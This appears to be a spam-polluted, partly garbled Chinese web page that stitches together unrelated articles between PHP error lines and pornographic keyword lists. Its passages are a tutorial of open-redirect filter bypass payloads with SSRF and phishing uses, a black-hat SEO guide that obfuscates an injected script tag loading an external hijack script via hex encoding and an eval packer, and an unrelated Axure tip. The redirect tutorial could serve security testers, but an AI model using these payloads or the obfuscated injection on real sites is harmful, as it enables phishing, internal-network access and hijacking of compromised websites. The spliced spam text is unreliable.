Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 久草精品在线观看,亚洲小视频网站,免费一级特黄视频

          整合營(yíng)銷服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢熱線:

          分享幾個(gè)繞過(guò)URL跳轉(zhuǎn)限制的思路

          分享幾個(gè)繞過(guò)URL跳轉(zhuǎn)限制的思路

          家對(duì)URL任意跳轉(zhuǎn)都肯定了解,也知道他的危害,這里我就不細(xì)說(shuō)了,過(guò)~

          大家遇到的肯定都是很多基于這樣的跳轉(zhuǎn)格式

          http://www.xxx.xxx/xxx?xxx=http://www.xxx.xxx/xxxxx

          基本的思路大家就是直接替換后面的URL來(lái)檢測(cè)是否存在任意URL跳轉(zhuǎn),如果不存在,就直接返回到它自己的域名,如果存在,就跳轉(zhuǎn)到你指定的URL,

          這里我講述我所知道的所有小點(diǎn)。

          0x01 利用問(wèn)號(hào)繞過(guò)限制

          利用問(wèn)號(hào),這是一個(gè)特性,利用問(wèn)號(hào)可以成功繞過(guò)URL限制

          比如:http://www.aaa.com/acb?Url=http://login.aaa.com 這是一個(gè)跳轉(zhuǎn)鏈接,跳轉(zhuǎn)到它的二級(jí)域名下,那么這個(gè)問(wèn)號(hào)放哪里可以繞過(guò)呢?其實(shí)就是放到它自身的域名前面也就是你添加的想要跳轉(zhuǎn)的域名的后面,如:http://www.aaa.com/acb?Url=http://test.com?login.aaa.com 那么,它其實(shí)是會(huì)跳轉(zhuǎn)到這個(gè)test.com域名下,這個(gè)域名是我想要跳轉(zhuǎn)的任意域名,而后面的它自身域名一定要帶上,不帶上就無(wú)法輔助用問(wèn)號(hào)?這個(gè)特性來(lái)跳轉(zhuǎn)到指定域名了,而跳轉(zhuǎn)后,問(wèn)號(hào)和問(wèn)號(hào)后面的內(nèi)容會(huì)變?yōu)檫@樣:http://www.test.com/?login.aaa.com

          0x02 利用反斜杠和正斜杠繞過(guò)限制

          這個(gè)是我自己研究出來(lái)的,不知道是否網(wǎng)上有人說(shuō)過(guò)。

          比如:http://www.aaa.com/acb?Url=http://login.aaa.com/ 同樣是在它本身域名前加上正斜杠,然后正斜杠前面跟上你想跳轉(zhuǎn)的域名地址。

          如:http://www.aaa.com/acb?Url=http://test.com/login.aaa.com

          反斜杠有三種思路

          兩個(gè)反斜杠繞過(guò)方法

          比如:http://www.aaa.com/acb?Url=http://login.aaa.com/ 同樣是在它本身域名前加上兩個(gè)反斜杠,然后兩個(gè)反斜杠前面跟上你想跳轉(zhuǎn)的域名地址。

          如:http://www.aaa.com/acb?Url=http://test.com\login.aaa.com

          一個(gè)反斜杠繞過(guò)方法

          如:http://www.aaa.com/acb?Url=http://test.comlogin.aaa.com

          另一種思路,一個(gè)反斜杠一個(gè)點(diǎn)

          利用.這樣的格式,也就是一個(gè)反斜杠加一個(gè)點(diǎn)來(lái)跳過(guò)限制,

          如:http://www.aaa.com/acb?Url=http://test.com.login.aaa.com

          0x03 利用@繞過(guò)URL限制

          如果你用這方法在火狐里進(jìn)行跳轉(zhuǎn),會(huì)有彈窗提示,在其它游覽器則沒(méi)有。

          如:<a href=”http://www.aaa.com/acb?Url=http://login.aaa.com@test.com“”>http://www.aaa.com/acb?Url=http://login.aaa.com@test.com 后面的test.com就是要跳轉(zhuǎn)到的域名,前面的域名都是用來(lái)輔助以繞過(guò)限制的。

          0x04 利用白名單缺陷繞過(guò)限制

          有的域名白名單限制是不全的,比如如果想利用一個(gè)跳轉(zhuǎn),而這個(gè)跳轉(zhuǎn)是通用,在這個(gè)公司網(wǎng)站很多子域名等都可以跳轉(zhuǎn),那么你買個(gè)域名也不算貴對(duì)吧。

          為什么這么說(shuō)呢,這個(gè)問(wèn)題就是白名單限制不當(dāng),比如,當(dāng)跳轉(zhuǎn)的域名包含這個(gè)網(wǎng)站下的所有域名,比如:http://www.aaa.com/acb?Url=http://login.aaa.com

          這個(gè)login.aaa.com也可以改成aaa.com同樣可以跳轉(zhuǎn)對(duì)吧,因?yàn)榘酌麊卫镏灰邪@個(gè)域名就直接成功跳轉(zhuǎn)。

          那么當(dāng)我在這個(gè)域名前面加上如testaaa.com,白名單里會(huì)檢查是否包含aaa.com這個(gè)域名,如果包含,就直接跳轉(zhuǎn),而并沒(méi)有檢查這個(gè)域名的整個(gè)信息,然后可以利用這個(gè)問(wèn)題,直接注冊(cè)一個(gè)testaaa.com這個(gè)域名就可以利用這個(gè)跳轉(zhuǎn)。

          0x05 多重驗(yàn)證&跳轉(zhuǎn)繞過(guò)限制

          現(xiàn)在很多網(wǎng)站都有多重驗(yàn)證,比如你登陸賬戶后會(huì)出現(xiàn)另一個(gè)驗(yàn)證頁(yè)面,輸入手機(jī)驗(yàn)證碼進(jìn)行驗(yàn)證,此時(shí)這上面的URL很可能存在任意跳轉(zhuǎn)的問(wèn)題。

          多重跳轉(zhuǎn)的問(wèn)題導(dǎo)致可繞過(guò)URL限制

          比如http://www.aaa.com/acb?Url=http: … ttp://login.aaa.com

          當(dāng)然,還有多重的,這個(gè)結(jié)構(gòu)的多重跳轉(zhuǎn)你修改最后面的URL就可以達(dá)到任意URL跳轉(zhuǎn),中間的URL就沒(méi)必要?jiǎng)恿恕?/p>

          0x06 點(diǎn)擊觸發(fā)達(dá)到繞過(guò)URL跳轉(zhuǎn)限制

          比如很多登陸頁(yè)面的地方,其URL是一個(gè)跳轉(zhuǎn)的URL

          如:http://www.aaa.com/acb?Url=http://test.com

          你直接修改了后面為任意URL,但是還是停留在原地,似乎沒(méi)什么問(wèn)題,但是,當(dāng)你輸入賬號(hào)和密碼后點(diǎn)擊登陸按鈕后,就會(huì)觸發(fā)跳轉(zhuǎn)。

          當(dāng)然,這個(gè)賬戶和密碼不一定要對(duì)的,隨便都可以,但得視系統(tǒng)而定吧。

          這個(gè)我遇到了很多,比如你修改了域名,然后點(diǎn)擊登陸,登陸成功后便可觸發(fā)跳轉(zhuǎn),這也是一個(gè)比較隱蔽的繞過(guò)URL限制的跳轉(zhuǎn)。

          0x07 利用xip.io繞過(guò)

          這個(gè)我還沒(méi)有在測(cè)試中應(yīng)用過(guò),其請(qǐng)求是http://www.127.0.0.1.xip.io 這個(gè)繞過(guò)是在SSRF場(chǎng)景中的繞過(guò),比如SSRF你要讀取內(nèi)網(wǎng)地址,一般都做了限制,可以嘗試用這方法進(jìn)行繞過(guò)限制,從而訪問(wèn)到內(nèi)網(wǎng)。

          另外一點(diǎn),URL跳轉(zhuǎn)涉及的安全問(wèn)題大家常見(jiàn)的就是釣魚,那么利用這個(gè)思路也可達(dá)成一個(gè)釣魚問(wèn)題,如,http://www.qq.com.220.181.57.217.xip.io

          當(dāng)你訪問(wèn)qq這個(gè)域名時(shí),其實(shí)這個(gè)鏈接已經(jīng)被解析到后面這個(gè)ip地址上了,那么實(shí)際訪問(wèn)的就是后面這個(gè)IP地址。

          0x08 利用超鏈接繞過(guò)可信站點(diǎn)限制

          比如一個(gè)URL,它是可以直接跳轉(zhuǎn)的,但是一般測(cè)試跳轉(zhuǎn)時(shí)大家習(xí)慣用www.baidu.com或qq.com這樣的可信站點(diǎn)進(jìn)行測(cè)試,但是有些網(wǎng)站是可以跳轉(zhuǎn)這些網(wǎng)站的。

          只要是可信站點(diǎn)且常用,基本都可以跳轉(zhuǎn),那么這就屬于正常的業(yè)務(wù)邏輯了,難度就這樣錯(cuò)失一個(gè)URL跳轉(zhuǎn)漏洞了?

          其實(shí)不然,只要你的URL被百度收錄過(guò),那么直接搜索你的域名,site:xxx.xxx

          因?yàn)槟阍诎俣壤稂c(diǎn)擊你的域名,它會(huì)先是一個(gè)302跳轉(zhuǎn),而這個(gè)302跳轉(zhuǎn)就是百度下的302跳轉(zhuǎn),那么這樣就可以繞過(guò)可信站點(diǎn)的限制,從而達(dá)到跳轉(zhuǎn)到指定URL。

          當(dāng)然,百度這個(gè)302有點(diǎn)長(zhǎng),你給它進(jìn)行加密就行。

          0x09 POST參數(shù)中的URL跳轉(zhuǎn)

          當(dāng)然,這個(gè)影響就很小了,比如當(dāng)你填什么表格或者需要填寫什么的,當(dāng)你上傳圖片,點(diǎn)擊下一步的時(shí)候,通常下一步就是預(yù)覽你填寫的信息,最后才是提交。

          當(dāng)你上傳了圖片后點(diǎn)擊下一步抓包,如果過(guò)濾不嚴(yán),你會(huì)看到圖片的完整地址包含在POST參數(shù)里,你就可以直接修改這個(gè)地址為任意URL,然后到達(dá)下一步。

          這時(shí)是確定信息也就是預(yù)覽自己填寫的信息的正確還是不正確,由于你剛剛修改了圖片地址,這里是沒(méi)有顯示出來(lái)的,圖像會(huì)是一個(gè)小XX。

          當(dāng)點(diǎn)擊圖片右鍵選擇查看圖像時(shí),就會(huì)觸發(fā)URL跳轉(zhuǎn)問(wèn)題,其實(shí)這個(gè)也可以利用來(lái)進(jìn)行釣魚,釣后臺(tái)審核員的信息。

          為什么呢,比如審核看到圖片無(wú)法加載,一般都會(huì)點(diǎn)擊查看圖片,然后跳轉(zhuǎn),如果安全意識(shí)不知就會(huì)造成安全影響。

          當(dāng)然,如果POST參數(shù)里就只是URL跳轉(zhuǎn)參數(shù),那么你可以給它轉(zhuǎn)成GET方式,然后進(jìn)行跳轉(zhuǎn)就可以了,只要網(wǎng)站支持這樣的GET方式就行。

          在Burp Suite里可以一鍵轉(zhuǎn)換提交方式,右鍵選擇Change request method就可以!

          0x10 利用#號(hào)繞過(guò)

          如:http://www.aaa.com/acb?Url=http://test.com#login.aaa.com

          小結(jié),想找到任意URL跳轉(zhuǎn)問(wèn)題,就不要光看表面,一個(gè)修改一個(gè)回車,不存在就不繼續(xù)深入了,這將永遠(yuǎn)無(wú)法成長(zhǎng)。

          我總結(jié)了我對(duì)于URL跳轉(zhuǎn)繞過(guò)限制的一些小點(diǎn),希望能夠幫助到大家!

          原文地址:http://blog.xbbai.site/post-150.html

          一些黑帽SEO要對(duì)跳轉(zhuǎn)的js代碼進(jìn)行加密,學(xué)習(xí)JavaScript加密方式,當(dāng)我們網(wǎng)站被黑時(shí),看到這段代碼就明白這就是快照劫持的代碼,刪掉即可解決網(wǎng)站被黑問(wèn)題。今天,錯(cuò)誤博客(cuowu.com)分享的內(nèi)容為《黑帽SEO教程為html中的js跳轉(zhuǎn)url加密》。希望對(duì)大家有所幫助。

          一、未加密的js代碼

          JavaScript跳轉(zhuǎn)是黑帽SEO中快照劫持常見(jiàn)操作手法,比如在寄生蟲程序使用中,在被黑掉的html或php中增加如下代碼就可以完成快照劫持:

          <script type=”text/javascript” src=”http://cuowu.com/ v6.js”></script>

          這段JavaScript代碼的作用是引入v6.js文件,v6.js文件中的內(nèi)容為if判斷語(yǔ)句,如果訪問(wèn)的是百度蜘蛛、360蜘蛛、搜狗蜘蛛等,則顯示劫持的快照內(nèi)容,如果是用戶直接訪問(wèn)瀏覽器則會(huì)顯示原頁(yè)面內(nèi)容。

          二、16進(jìn)制加密

          首先把上面的命令增加為如下:

          window[“document”][“write”](‘scritp type=”text/javascript” scr=”https://cuowu.com/ v6.js”‘)</script>;

          然后,對(duì)前面雙引號(hào)內(nèi)的內(nèi)容進(jìn)行16進(jìn)制加密,后面單引號(hào)內(nèi)容也同樣進(jìn)行16進(jìn)制加密,依次為:

          \x64\x6f\x63\x75\x6d\x65\x6e\x74

          \x77\x72\x69\x74\x65

          \x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73

          這個(gè)可以用utf-8轉(zhuǎn)16進(jìn)制加密在線工具即可。錯(cuò)誤博客站長(zhǎng)導(dǎo)航里面有。

          站長(zhǎng)導(dǎo)航(https://cuowu.com/daohang/)

          加密完成后變?yōu)椋?/span>

          window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;

          三、JS混淆加密壓縮

          然后,把上述的js代碼再次補(bǔ)充一下才能正常運(yùn)行,即:

          <script type=”text/javascript”>

          window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;

          </script>

          把中間window到</script>;的內(nèi)容利用站長(zhǎng)工具的JS混淆加密壓縮就可以得到eval加密形式,錯(cuò)誤博客站長(zhǎng)導(dǎo)航里面有。

          站長(zhǎng)導(dǎo)航(https://cuowu.com/daohang/)

          獲得如下加密代碼如下:

          eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

          最終獲得的加密代碼如下:

          <script type=”text/javascript”>

          eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

          </script>

          這就是全部的js加密壓縮過(guò)程了,解壓過(guò)程反過(guò)來(lái)推就可以了。

          以上就是錯(cuò)誤博客(https://cuowu.com/)分享的內(nèi)容為《黑帽SEO為html中的js加密(js混淆與16進(jìn)制加密)》。感謝您的閱讀。更多原創(chuàng)搜索“錯(cuò)誤博客”。

          什么要隱藏Axure原型式需求文檔菜單列表?

          很多時(shí)候產(chǎn)品經(jīng)理輸出完原型圖生成HTML文件給到相應(yīng)的開發(fā)、測(cè)試等小伙伴提前閱讀熟悉產(chǎn)品功能需求,然后再組織講解產(chǎn)品功能需求,但總有很多小伙伴們不認(rèn)真聽需求講解,事后對(duì)需求理解存在偏差,根據(jù)自我對(duì)需求的理解進(jìn)行設(shè)計(jì)開發(fā),導(dǎo)致研發(fā)出來(lái)的產(chǎn)品與需求有差異,最后還甩鍋給產(chǎn)品經(jīng)理沒(méi)有寫清楚需求、沒(méi)有講明白需求、看不懂需求文檔。

          根據(jù)與開發(fā)、測(cè)試多年打交道的經(jīng)驗(yàn)總結(jié),大部分的開發(fā)、測(cè)試都不太喜歡復(fù)雜的需求文檔,反而喜歡看原型圖以及圖中需求說(shuō)明。

          在產(chǎn)品迭代的過(guò)程中,為了保證產(chǎn)品需求文檔從0-1的完整性,方便新加入的產(chǎn)品經(jīng)理、開發(fā)、測(cè)試快速熟悉產(chǎn)品、接手產(chǎn)品,所有的版本迭代記錄最好歸檔在一個(gè)Axure文件中。

          那么問(wèn)題來(lái)了:在版本迭代的時(shí)候即便我們做了需求導(dǎo)航,開發(fā)、測(cè)試小伙伴可以通過(guò)點(diǎn)擊導(dǎo)航直接跳轉(zhuǎn)至詳細(xì)的原型圖需求說(shuō)明頁(yè)面(上一篇文章有介紹),但是開發(fā)、測(cè)試小伙伴往往會(huì)忽視需求導(dǎo)航,直接從HTML文件的菜單列表直接點(diǎn)開查看(如圖1),由于菜單列表太多他們根本看不懂、找不到迭代需求在哪里,這個(gè)時(shí)候我們就需要利用一些方法隱藏HTML文件左側(cè)的菜單列表,強(qiáng)制開發(fā)、測(cè)試等小伙伴通過(guò)版本迭代需求導(dǎo)航跳轉(zhuǎn)至原型圖需求說(shuō)明頁(yè)面,這樣閱讀起來(lái)就非常方便快捷。



          下面我將通過(guò)具體的操作步驟來(lái)講解如何隱藏HTML文件的菜單列表。

          第一,Axure生成HTML文件時(shí),選擇頁(yè)面只勾選需求目錄大綱,點(diǎn)擊生成。



          第二,找到剛才生成的HTML文件并打開,找到data文件并打開,剪切這個(gè)js文件存放到桌面。



          第三,再次用Axure生成HTML文件,選擇生成所有頁(yè)面并點(diǎn)擊生成到此前生成的HTML文件中。



          第四,再次找到剛才生成的HTML文件并打開,找到data文件并打開,將此前剪切到桌面的js文件替換當(dāng)前的js文件。



          第五,最后打開Axure原型式產(chǎn)品需求文檔,就會(huì)看到效果如下圖不會(huì)再顯示左側(cè)菜單列表了。


          主站蜘蛛池模板: 丰满少妇内射一区| 丝袜美腿一区二区三区| 亚洲av无码一区二区三区人妖| 精品乱码一区内射人妻无码 | 夜夜高潮夜夜爽夜夜爱爱一区| 一区二区乱子伦在线播放| 天天看高清无码一区二区三区| 正在播放国产一区| 91成人爽a毛片一区二区| 亚洲av无码一区二区三区乱子伦| av无码一区二区三区| 成人精品一区久久久久| 综合无码一区二区三区四区五区| 91福利国产在线观一区二区| 久久99热狠狠色精品一区| 中文字幕一区视频一线| 一区二区三区精品高清视频免费在线播放 | 亚洲一区二区三区久久| 少妇激情一区二区三区视频| 久久精品岛国av一区二区无码| 成人日韩熟女高清视频一区| 红杏亚洲影院一区二区三区| 中文字幕一区二区三区日韩精品 | 亚洲精品无码一区二区| 3D动漫精品啪啪一区二区下载| 亚洲一区免费视频| 中文字幕AV一区二区三区人妻少妇| 色噜噜狠狠一区二区三区| 亚洲欧美日韩中文字幕一区二区三区| 国产精品一区在线麻豆| 久久久久久人妻一区二区三区| 国产成人一区二区三区精品久久| 国产一区二区三区小向美奈子 | 日韩人妻一区二区三区免费| 无码国产精品一区二区免费3p| 国产福利91精品一区二区 | 国产伦精品一区二区三区视频猫咪 | 制服丝袜一区二区三区| 日韩人妻一区二区三区蜜桃视频| 亚洲一区免费视频| 成人国产精品一区二区网站|